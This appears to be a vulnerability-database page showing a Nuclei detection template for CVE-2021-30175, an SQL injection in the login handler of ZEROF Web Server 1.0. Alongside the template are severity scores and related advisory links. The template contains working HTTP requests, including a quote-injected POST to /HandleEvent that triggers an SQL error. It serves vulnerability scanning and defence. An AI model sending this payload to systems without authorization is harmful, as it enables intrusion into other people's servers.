Lucene search
K

ZEROF Web Server 1.0 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

ZEROF Web Server 1.0 SQL Injection via /HandleEvent endpoint for logi

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-30175
21 Sep 202106:42
circl
CNNVD
ZEROF Web Server SQL注入漏洞
13 Apr 202100:00
cnnvd
CVE
CVE-2021-30175
13 Apr 202113:44
cve
Cvelist
CVE-2021-30175
13 Apr 202113:44
cvelist
NVD
CVE-2021-30175
13 Apr 202114:15
nvd
OSV
CVE-2021-30175
13 Apr 202114:15
osv
Prion
Sql injection
13 Apr 202114:15
prion
RedhatCVE
CVE-2021-30175
22 May 202519:38
redhatcve
id: CVE-2021-30175

info:
  name: ZEROF Web Server 1.0 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0.
  reference:
    - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md
    - https://pro.zerof.ru
    - https://github.com/awillix/research
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30175
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-30175
    cwe-id: CWE-89
    epss-score: 0.08548
    epss-percentile: 0.94406
    cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zerof
    product: web_server
    shodan-query: cpe:"cpe:2.3:a:google:web_server"
  tags: cve2021,cve,zerof,sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "_S_ID", "<title>ZEROF Web Server</title>")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: s_id
        internal: true
        group: 1
        regex:
          - '_S_ID="_S_ID=(.*?)";'

  - raw:
      - |
        POST /HandleEvent HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID={{s_id}}&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You have an error in your SQL syntax"

      - type: word
        part: header
        words:
          - "ZEROF"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a355751275ded4bd43cc5cc601fd491db29eef6f5ca3a3c4c3ab9e55bd73cf800221009eafa133f35d29f70bba6b09f71d5ddbd55d8237d5e47470184766ba4b8aea41:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.08548
45